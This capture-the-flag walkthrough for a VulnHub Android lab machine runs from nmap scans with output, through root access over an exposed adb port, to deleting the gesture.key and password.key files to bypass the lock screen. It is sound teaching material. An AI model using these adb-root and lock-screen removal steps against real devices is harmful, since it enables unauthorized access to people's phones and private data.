Be the investigator to finish this machine. It is for beginners only. Share your screenshot on the Telegram group; the group link will be in the flag.
Author: Sivanesh Kumar
Download link- https://download.vulnhub.com/investigator/Investigator.ova
SCANNING
Scan the target IP address with a full nmap port scan (all 65535 TCP ports):
nmap -p- 192.168.122.136
Let's find out the service versions on the open ports.
nmap -sV -A 192.168.122.136
nmap -sV -A -p 22000 192.168.122.136
After finding the open ports (5555, 8080 and 22000), let's run nmap's vulnerability scripts against them:
nmap -sV -A --script vuln -p 5555,8080,22000 192.168.122.136
root@kali:~# nmap -sV -A --script vuln -p 5555,8080,22000 192.168.122.136
Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-08 07:51 EDT
Nmap scan report for 192.168.122.136
Host is up (0.0014s latency).
PORT STATE SERVICE VERSION
5555/tcp open freeciv?
8080/tcp open http PHP cli server 5.5 or later
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
22000/tcp open ssh Dropbear sshd 2014.66 (protocol 2.0)
MAC Address: 00:0C:29:5F:64:48 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.42 ms 192.168.122.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 632.98 seconds
root@kali:~#
Apart from a "likely vulnerable" Slowloris DoS result on the PHP CLI server, the vulnerability scripts found nothing useful for getting a shell. Note that nmap could not identify the service on 5555 ("freeciv?"): 5555/tcp is the default port of the Android Debug Bridge daemon when it listens over TCP, which is the lead that matters later.
Enumeration
Let's open port 8080 in a web browser.
Running nikto:
nikto -h http://192.168.122.136:8080/
We found nothing useful.
After this I used dirb to brute-force directories and found backdoor.php, but it only says "fake backdoor".
After some research on port 5555: it is the default port of adbd, the Android Debug Bridge daemon, when debugging is enabled over TCP (adb tcpip 5555). If adbd is reachable and does not require USB-debugging authorization, anyone who can connect to the port gets a shell on the device.
To install adb:
- in Kali use the command: sudo apt-get install adb
- in Windows download Appie (a portable Android pentest environment that bundles adb)
Let's connect to the Android device using adb.
adb connect 192.168.122.136:5555
adb shell
su root (switch to the root user; adbd on this device runs unrestricted, so su succeeds)
Exploitation
After getting a root shell, go to the directory /data/root:
cd /data/root
We found flag.txt.
But this is only the first level. The flag also contains a secret key, which could be the lock-screen password.
I tried unlocking the lock screen with the secret key but failed to open it.
Then I removed the gesture.key and password.key files to bypass the lock screen.
cd /data/system
rm gesture.key
rm password.key

This works because on this Android version the pattern and PIN/password hashes live in those two files under /data/system; with root access nothing protects them. (Android 6.0 and later keep the credential in gatekeeper.pattern.key and gatekeeper.password.key instead.) After deleting both files, reboot the Android device with:
adb reboot
Then unlock the device by just pressing Enter at the lock screen: with the key files gone, no pattern or password is checked.
After searching for the flag, I found it in the messaging app. It was also asking for a password. I used the secret key 259148637 as the pattern to unlock it.
The flag is in the message from (666) 666-6666.